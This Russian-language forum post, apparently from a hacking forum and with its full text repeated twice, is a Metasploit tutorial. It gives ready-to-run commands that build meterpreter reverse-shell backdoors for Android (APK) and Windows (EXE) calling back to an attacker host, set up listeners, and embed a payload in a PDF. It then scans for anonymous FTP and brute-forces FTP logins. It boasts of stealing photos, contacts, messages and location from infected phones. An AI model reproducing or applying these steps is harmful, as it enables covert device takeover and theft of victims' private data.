User17
13.02.2023, 19:43
https://forum.antichat.xyz/attachments/4925645/img_9bb9b2457a.png
Введение
Рад приветствовать дорогих читателей! Я практически уверен, что все, кто читает данную статью, как минимум слышали про такой замечательный фреймворк как Metasploit. Данный фреймворк хранит в себе довольно богатую базу данных различных уязвимостей на любой вкус и цвет, которые только возможно проэксплуатировать. В этой статье хочу познакомить вас с некоторыми полезными и даже можно выразиться базовыми уязвимостями, которые здорово помогут вам в изучении сферы информационной безопасности и естественно в саморазвитии.
Дисклеймер: Все данные, предоставленные в данной статье, взяты из открытых источников, не призывают к действию и являются только лишь данными для ознакомления, и изучения механизмов используемых технологий.
Практическая часть
Итак, конечно же все действия будут проводиться на моей любимой Kali Linux, тем более там этот фреймворк уже предустановлен, поэтому если что, можно сразу к командам приступать и не париться.
Бэкдор на андроид
Здесь мы будем генерировать полезную нагрузку на андроид устройствах, делается всё довольно просто.
Мы вписываем вот такую команду для генерации:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test.apk
Что же означает данная команда? Давайте разберём!
Часть строки, где написано android, указывает на операционную систему, под которую генерируется полезная нагрузка;
meterpreter/reverse_tcp означает то, что подключаться к хосту данный бэкдор будет по протоколу tcp;
lhost = 192.168.0.9 означает IP хоста, к которому будет подключаться бэкдор. Так как в рамках тестирования и ознакомления всё будет проходить в локальной сети, я ввёл свой локальный IP адрес. Для того, чтобы можно было подключиться из глобальной сети к вам, соответственно, нужен будет глобальный ваш IP адрес и при реверс инжиниринге бэкдора, его будет довольно легко выявить;
lport = 4444 это собственно порт, по которому бэкдор будет обращаться к нам;
И как не сложно догадаться, в строчке R > Test.apk задаётся название нашей полезной нагрузке.
После того как она сгенерировалась, у вас в каталоге появиться ваш apk файл. Теперь я закидываю бэкдор на тестовое устройство android, но перед тем как его закинуть, нужно подготовиться к ловле сессии в нашем фреймворке. Для этого нам нужно будет его запустить вот этой командой msfconsole.
После того как мы его запустили, нам нужно выбрать нашу полезную нагрузку, а для этого вписываем последовательно следующие команды:
use exploit/multi/handler
в данной команде мы выбираем эксплоит удалённого доступа
set payload android/meterpreter/reverse_tcp
здесь мы выбираем платформу и способ подключения
set lhost 192.168.0.9
задаём наш хост
set lport 4444
задаём порт
exploit
ну и собственно запускаем
https://forum.antichat.xyz/attachments/4925645/1676302650481.png
Ну теперь я устанавливаю и открываю файл полезной нагрузки, и на экране моментально получаю сессию к моему устройству. Спектр возможностей удалённого доступа здесь весьма обширный. Можно сделать фотку через любую из камер телефона, лазить по директориям и скачивать какие-либо файлы, делать полный дамп номеров в телефонной книге, сообщений и звонков, узнать местоположение и многое многое другое.
Бэкдор на Windows.
Ну здесь всё происходит впринципе аналогичным образом, нужно будет поменять лишь несколько строчек.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test2.exe
Команда так же весьма проста и понятна, поэтому переходим сразу к нашему фреймворку. Запускаем его msfconsole.
Ну и далее так же по очереди запускаем следующие команды
Код:
use exploit/mulit/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 4444
exploit
https://forum.antichat.xyz/attachments/4925645/1676302664533.png
Далее аналогичным образом проверяем всё это дело на Windows по средством запуска и сессия готова.
Эксплоит в PDF
Так же для фреймворка не составит труда сгенерировать PDF файл с полезной нагрузкой и аналогичным образом подключиться к нему. Давайте же приступим!
Здесь уже msfvenom нам не понадобиться, будем всё делать прямиком в метасплоите, поэтому снова его запускаем msfconsole.
Далее прописываем вот такие команды:
Код:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Здесь будет задействован эксполит, который будет встроен в PDF файл
Код:
set lhost 192.168.0.9
set lport 4444
set filename Test3.pdf
Здесь задаём имя нашему файлу
Код:
exploit
https://forum.antichat.xyz/attachments/4925645/1676302691690.png
Ну и далее генерируется полезная нагрузка в виде файла PDF. Подключиться можно будет так же через multi/handler. То есть просто не выходя из консоли прописываем:
Код:
use exploit/multi/handler
set lhost 192.168.0.9
set lport 4444
exploit
Ну и ждём сессии.
Вход по ftp
Так же наш фреймворк может спокойно просканировать диапазон IP адресов на возможность подключения к какому-либо с помощью ftp через логин Anonymous
Для этого мы запускаем наш фреймворк msfconsole.
И вводим следующие команды:
Код:
use auxiliary/scanner/ftp/anonymous
Выбираем наш сканер
Код:
set RHOSTS 192.168.1.200-254
Выбираем диапазон адресов для сканирования
Код:
set THREADS 55
run
Ну и собственно далее на экране у нас будут адреса на которых есть ftp и к которым можно подключиться через логин Anonymous без пароля и легко получить доступ.
https://forum.antichat.xyz/attachments/4925645/1676302705781.png
Таким же образом можно и подбирать логин с паролем к диапазону адресов, для этого вводим следующие команды:
Код:
set RHOSTS 192.168.69.50-254
set THREADS 205
set USERNAME msfadmin
set PASSWORD msfadmin
set VERBOSE false
run
https://forum.antichat.xyz/attachments/4925645/1676302718311.png
Ну и далее мы увидим адреса на которых есть ftp и к которым можно подключиться используя заданные вами логин и пароль для подбора.
Заключение
Сегодня поведал вам немного о такой волшебной и удивительной штуке как Metasploit Framework. И у него весьма широкий спектр применений, через него можно выполнять практически все ключевые задачи в тестировании чего-либо на уязвимость, но опять же повторюсь, что данная статья не побуждает к злонамеренным действиям и несёт лишь ознакомительный характер.
Введение
Рад приветствовать дорогих читателей! Я практически уверен, что все, кто читает данную статью, как минимум слышали про такой замечательный фреймворк как Metasploit. Данный фреймворк хранит в себе довольно богатую базу данных различных уязвимостей на любой вкус и цвет, которые только возможно проэксплуатировать. В этой статье хочу познакомить вас с некоторыми полезными и даже можно выразиться базовыми уязвимостями, которые здорово помогут вам в изучении сферы информационной безопасности и естественно в саморазвитии.
Дисклеймер: Все данные, предоставленные в данной статье, взяты из открытых источников, не призывают к действию и являются только лишь данными для ознакомления, и изучения механизмов используемых технологий.
Практическая часть
Итак, конечно же все действия будут проводиться на моей любимой Kali Linux, тем более там этот фреймворк уже предустановлен, поэтому если что, можно сразу к командам приступать и не париться.
Бэкдор на андроид
Здесь мы будем генерировать полезную нагрузку на андроид устройствах, делается всё довольно просто.
Мы вписываем вот такую команду для генерации:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test.apk
Что же означает данная команда? Давайте разберём!
Часть строки, где написано android, указывает на операционную систему, под которую генерируется полезная нагрузка;
meterpreter/reverse_tcp означает то, что подключаться к хосту данный бэкдор будет по протоколу tcp;
lhost = 192.168.0.9 означает IP хоста, к которому будет подключаться бэкдор. Так как в рамках тестирования и ознакомления всё будет проходить в локальной сети, я ввёл свой локальный IP адрес. Для того, чтобы можно было подключиться из глобальной сети к вам, соответственно, нужен будет глобальный ваш IP адрес и при реверс инжиниринге бэкдора, его будет довольно легко выявить;
lport = 4444 это собственно порт, по которому бэкдор будет обращаться к нам;
И как не сложно догадаться, в строчке R > Test.apk задаётся название нашей полезной нагрузке.
После того как она сгенерировалась, у вас в каталоге появиться ваш apk файл. Теперь я закидываю бэкдор на тестовое устройство android, но перед тем как его закинуть, нужно подготовиться к ловле сессии в нашем фреймворке. Для этого нам нужно будет его запустить вот этой командой msfconsole.
После того как мы его запустили, нам нужно выбрать нашу полезную нагрузку, а для этого вписываем последовательно следующие команды:
use exploit/multi/handler
в данной команде мы выбираем эксплоит удалённого доступа
set payload android/meterpreter/reverse_tcp
здесь мы выбираем платформу и способ подключения
set lhost 192.168.0.9
задаём наш хост
set lport 4444
задаём порт
exploit
ну и собственно запускаем
https://forum.antichat.xyz/attachments/4925645/1676302650481.png
Ну теперь я устанавливаю и открываю файл полезной нагрузки, и на экране моментально получаю сессию к моему устройству. Спектр возможностей удалённого доступа здесь весьма обширный. Можно сделать фотку через любую из камер телефона, лазить по директориям и скачивать какие-либо файлы, делать полный дамп номеров в телефонной книге, сообщений и звонков, узнать местоположение и многое многое другое.
Бэкдор на Windows.
Ну здесь всё происходит впринципе аналогичным образом, нужно будет поменять лишь несколько строчек.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test2.exe
Команда так же весьма проста и понятна, поэтому переходим сразу к нашему фреймворку. Запускаем его msfconsole.
Ну и далее так же по очереди запускаем следующие команды
Код:
use exploit/mulit/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 4444
exploit
https://forum.antichat.xyz/attachments/4925645/1676302664533.png
Далее аналогичным образом проверяем всё это дело на Windows по средством запуска и сессия готова.
Эксплоит в PDF
Так же для фреймворка не составит труда сгенерировать PDF файл с полезной нагрузкой и аналогичным образом подключиться к нему. Давайте же приступим!
Здесь уже msfvenom нам не понадобиться, будем всё делать прямиком в метасплоите, поэтому снова его запускаем msfconsole.
Далее прописываем вот такие команды:
Код:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Здесь будет задействован эксполит, который будет встроен в PDF файл
Код:
set lhost 192.168.0.9
set lport 4444
set filename Test3.pdf
Здесь задаём имя нашему файлу
Код:
exploit
https://forum.antichat.xyz/attachments/4925645/1676302691690.png
Ну и далее генерируется полезная нагрузка в виде файла PDF. Подключиться можно будет так же через multi/handler. То есть просто не выходя из консоли прописываем:
Код:
use exploit/multi/handler
set lhost 192.168.0.9
set lport 4444
exploit
Ну и ждём сессии.
Вход по ftp
Так же наш фреймворк может спокойно просканировать диапазон IP адресов на возможность подключения к какому-либо с помощью ftp через логин Anonymous
Для этого мы запускаем наш фреймворк msfconsole.
И вводим следующие команды:
Код:
use auxiliary/scanner/ftp/anonymous
Выбираем наш сканер
Код:
set RHOSTS 192.168.1.200-254
Выбираем диапазон адресов для сканирования
Код:
set THREADS 55
run
Ну и собственно далее на экране у нас будут адреса на которых есть ftp и к которым можно подключиться через логин Anonymous без пароля и легко получить доступ.
https://forum.antichat.xyz/attachments/4925645/1676302705781.png
Таким же образом можно и подбирать логин с паролем к диапазону адресов, для этого вводим следующие команды:
Код:
set RHOSTS 192.168.69.50-254
set THREADS 205
set USERNAME msfadmin
set PASSWORD msfadmin
set VERBOSE false
run
https://forum.antichat.xyz/attachments/4925645/1676302718311.png
Ну и далее мы увидим адреса на которых есть ftp и к которым можно подключиться используя заданные вами логин и пароль для подбора.
Заключение
Сегодня поведал вам немного о такой волшебной и удивительной штуке как Metasploit Framework. И у него весьма широкий спектр применений, через него можно выполнять практически все ключевые задачи в тестировании чего-либо на уязвимость, но опять же повторюсь, что данная статья не побуждает к злонамеренным действиям и несёт лишь ознакомительный характер.